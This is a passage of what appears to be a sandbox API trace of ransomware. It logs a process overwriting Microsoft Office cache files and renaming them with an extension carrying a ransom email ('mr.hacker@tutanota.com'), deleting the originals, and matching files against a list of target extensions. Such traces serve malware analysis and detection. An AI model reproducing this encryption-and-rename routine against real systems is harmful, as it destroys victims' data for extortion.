(lpString="PrjProrWW.msi") returned 13 [0050.929] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.778] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=10798080) returned 1 [0051.778] CloseHandle (hObject=0x210) returned 1 [0051.778] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi")) returned 0x2020 [0051.779] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0051.779] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0051.884] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0051.884] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.884] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.885] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.934] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.934] ReadFile (in: hFile=0x210, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.938] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.938] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.938] ReadFile (in: hFile=0x210, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.955] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.956] WriteFile (in: hFile=0x210, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0052.153] SetEndOfFile (hFile=0x210) returned 1 [0052.153] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0052.157] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.157] WriteFile (in: hFile=0x210, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.158] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x36ec00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.158] WriteFile (in: hFile=0x210, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.172] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xa0c400, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.172] WriteFile (in: hFile=0x210, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.176] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0052.176] CloseHandle (hObject=0x210) returned 1 [0052.177] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.177] lstrlenW (lpString=".doc") returned 4 [0052.177] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.177] lstrlenW (lpString=".docx") returned 5 [0052.177] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.177] lstrlenW (lpString=".pdf") returned 4 [0052.177] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.178] lstrlenW (lpString=".xls") returned 4 [0052.178] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.178] lstrlenW (lpString=".xlsx") returned 5 [0052.178] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.178] lstrlenW (lpString=".ppt") returned 4 [0052.178] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.178] lstrlenW (lpString=".zip") returned 4 [0052.178] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.178] lstrlenW (lpString=".rar") returned 4 [0052.178] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.178] lstrlenW (lpString=".bz2") returned 4 [0052.178] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.178] lstrlenW (lpString=".7z") returned 3 [0052.178] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.178] lstrlenW (lpString=".dbf") returned 4 [0052.178] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.178] lstrlenW (lpString=".1cd") returned 4 [0052.178] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.178] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.183] lstrlenW (lpString=".jpg") returned 4 [0052.183] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.186] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.186] lstrlenW (lpString=".doc") returned 4 [0052.186] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.186] lstrlenW (lpString=".docx") returned 5 [0052.187] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.187] lstrlenW (lpString=".pdf") returned 4 [0052.187] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.187] lstrlenW (lpString=".xls") returned 4 [0052.190] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.193] lstrlenW (lpString=".xlsx") returned 5 [0052.193] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.193] lstrlenW (lpString=".ppt") returned 4 [0052.193] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.193] lstrlenW (lpString=".zip") returned 4 [0052.193] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.193] lstrlenW (lpString=".rar") returned 4 [0052.193] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.193] lstrlenW (lpString=".bz2") returned 4 [0052.193] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.193] lstrlenW (lpString=".7z") returned 3 [0052.193] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.193] lstrlenW (lpString=".dbf") returned 4 [0052.193] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.193] lstrlenW (lpString=".1cd") returned 4 [0052.193] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.193] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 76 [0052.193] lstrlenW (lpString=".jpg") returned 4 [0052.193] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.194] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0052.194] lstrlenW (lpString="ose.exe") returned 7 [0052.194] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.341] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=174440) returned 1 [0052.341] CloseHandle (hObject=0x210) returned 1 [0052.341] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0052.341] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.341] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.341] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.341] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.341] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0052.341] GetLastError () returned 0x0 [0052.341] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0052.346] WriteFile (in: hFile=0x218, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0052.349] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.349] WriteFile (in: hFile=0x218, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0052.350] SetEndOfFile (hFile=0x218) returned 1 [0052.350] CloseHandle (hObject=0x218) returned 1 [0052.350] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.350] SetEndOfFile (hFile=0x210) returned 1 [0052.351] CloseHandle (hObject=0x210) returned 1 [0052.352] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.352] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0052.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.352] lstrlenW (lpString=".doc") returned 4 [0052.352] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.352] lstrlenW (lpString=".docx") returned 5 [0052.352] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.352] lstrlenW (lpString=".pdf") returned 4 [0052.352] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.352] lstrlenW (lpString=".xls") returned 4 [0052.352] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.352] lstrlenW (lpString=".xlsx") returned 5 [0052.352] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.352] lstrlenW (lpString=".ppt") returned 4 [0052.352] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.352] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.352] lstrlenW (lpString=".zip") returned 4 [0052.352] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.352] lstrlenW (lpString=".rar") returned 4 [0052.353] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.353] lstrlenW (lpString=".bz2") returned 4 [0052.353] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.353] lstrlenW (lpString=".7z") returned 3 [0052.353] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.353] lstrlenW (lpString=".dbf") returned 4 [0052.353] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.353] lstrlenW (lpString=".1cd") returned 4 [0052.353] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.353] lstrlenW (lpString=".jpg") returned 4 [0052.353] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.353] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.353] lstrlenW (lpString=".doc") returned 4 [0052.353] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.353] lstrlenW (lpString=".docx") returned 5 [0052.353] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.353] lstrlenW (lpString=".pdf") returned 4 [0052.353] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.353] lstrlenW (lpString=".xls") returned 4 [0052.353] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.353] lstrlenW (lpString=".xlsx") returned 5 [0052.354] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.354] lstrlenW (lpString=".ppt") returned 4 [0052.354] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.354] lstrlenW (lpString=".zip") returned 4 [0052.354] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.354] lstrlenW (lpString=".rar") returned 4 [0052.354] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.354] lstrlenW (lpString=".bz2") returned 4 [0052.354] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.354] lstrlenW (lpString=".7z") returned 3 [0052.354] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.354] lstrlenW (lpString=".dbf") returned 4 [0052.354] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.354] lstrlenW (lpString=".1cd") returned 4 [0052.354] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.354] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0052.354] lstrlenW (lpString=".jpg") returned 4 [0052.354] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.354] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0052.354] lstrlenW (lpString="PidGenX.dll") returned 11 [0052.354] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.355] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=1463568) returned 1 [0052.355] CloseHandle (hObject=0x210) returned 1 [0052.355] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0052.355] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.355] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0052.355] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.355] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.355] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0052.355] GetLastError () returned 0x0 [0052.355] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0052.570] WriteFile (in: hFile=0x218, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0053.161] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x65520, lpOverlapped=0x0) returned 1 [0053.175] WriteFile (in: hFile=0x218, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0053.185] ReadFile (in: hFile=0x210, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.185] WriteFile (in: hFile=0x218, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xea, lpOverlapped=0x0) returned 1 [0053.185] SetEndOfFile (hFile=0x218) returned 1 [0053.297] CloseHandle (hObject=0x218) returned 1 [0053.297] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.297] SetEndOfFile (hFile=0x210) returned 1 [0053.617] CloseHandle (hObject=0x210) returned 1 [0053.617] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0053.617] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0053.930] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.931] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.931] lstrlenW (lpString=".doc") returned 4 [0053.931] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0053.931] lstrlenW (lpString=".docx") returned 5 [0053.933] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0053.933] lstrlenW (lpString=".pdf") returned 4 [0053.933] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString=".xls") returned 4 [0053.934] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString=".xlsx") returned 5 [0053.934] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0053.934] lstrlenW (lpString=".ppt") returned 4 [0053.934] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString=".zip") returned 4 [0053.934] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString=".rar") returned 4 [0053.934] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0053.934] lstrlenW (lpString=".bz2") returned 4 [0053.934] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0053.934] lstrlenW (lpString=".7z") returned 3 [0053.934] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString=".dbf") returned 4 [0053.934] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0053.934] lstrlenW (lpString=".1cd") returned 4 [0053.934] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0053.934] lstrlenW (lpString="C:\\MSOCache\\All 